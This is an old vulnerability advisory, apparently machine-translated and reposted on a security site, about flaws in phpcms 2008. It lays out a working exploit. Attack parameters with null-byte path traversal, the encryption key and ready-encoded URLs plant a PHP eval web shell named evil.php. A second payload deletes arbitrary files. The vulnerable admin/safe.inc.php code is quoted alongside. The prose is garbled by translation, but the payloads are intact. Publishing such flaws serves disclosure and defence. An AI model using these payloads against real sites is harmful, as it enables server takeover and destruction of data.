phpcms local contains a vulnerability caused by a write shell vulnerability, and delete arbitrary file vulnerability-vulnerability warning-the black bar safety net

2011-04-07T00:00:00
ID MYHACK58:62201130015
Type myhack58
Reporter 佚名
Modified 2011-04-07T00:00:00

Description

by c4rp3nt3r@0x50sec.org phpcms2008 sp2 or sp4 even didn't look carefully These days a bug vulnerable., manufacturers ignored, is as install X, OK, the mood is unhappy. no matter so much.

phpcms local contains to get the shell method, this article connected to a

the phpcms the phpcms_auth result of any variable overwrite vulnerability, local file include vulnerability and arbitrary File Download vulnerabilities of

phpcms local contains the class of vulnerability, if the file contains a/include/common. inc. php can be included to perform a lot of back to execute the file.

Since phpcms global variables of the mechanisms that lead to be able to get a shell in many ways, a similar problem more than one.

admin/safe. inc. php file is a background scan Trojan programs, but it is a pity that although the file name is made safe, but not safe.

Published a local contains spike took the shell method.

Contains:admin/safe. inc. php file GET submitted data

Will be generated under the root directory a word With on a get the key$key=’sIpeofogblFVCildZEwe’; Encrypt the following string $evil=’i=1&m=1&f=fuck&action=edit_code&file_path=evil. php&code=<? eval($_POST[a])?& gt;&mod=../../admin/safe. inc. php%0 0';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChx

gNSwNCVlmehITEiVYQTA2IDQ2NycLalZsqjcqe1hdz19lqukoaw8fkhkwcaobdcwzbl05gbvkvl8=

Will be generated under the root directory word Trojan

Similarly arbitrary file delete vulnerability: $evil=’i=1&m=1&f=fuck&action=del_file&files=robots. txt&mod=../../admin/safe. inc. php%0 0';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtB

DwMia21HQ0p0ahYBHiAeShwHCQJMBSg1brkefh91rw==

Posted on the loopholes in the code //admin/safe.inc.php <? php defined(‘IN_PHPCMS’) or exit(‘Access Denied’); // include/common.inc.php inside the Declaration of the constant // define(‘IN_PHPCMS’, TRUE);

if(empty($action)) $action = “start”; $safe = cache_read(‘safe.php’); $file = load(‘filecheck.class.php’); if(empty($safe)) { $safe = array ( ‘file_type’ => ‘php|js’, ‘code’ => ”, ‘func’ => ‘com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress’, ‘dir’ => $file->checked_dirs() ); } switch ($action) { ... case ‘edit_code’: if (file_put_contents(PHPCMS_ROOT.$ file_path, stripcslashes($code))) { showmessage(‘modify success!’); } break;

case ‘del_file’: $file_path = urldecode($files);

if (empty($file_path)) { showmessage(‘please select File’); } $file_list = cache_read(‘scan_backdoor.php’); unset($file_list[$file_path]); cache_write(‘scan_backdoor.php’,$file_list); @unlink(PHPCMS_ROOT.$ file_path); showmessage(‘file deleted successfully!’, ‘? mod=phpcms&file=safe&action=scan_table’); break; ...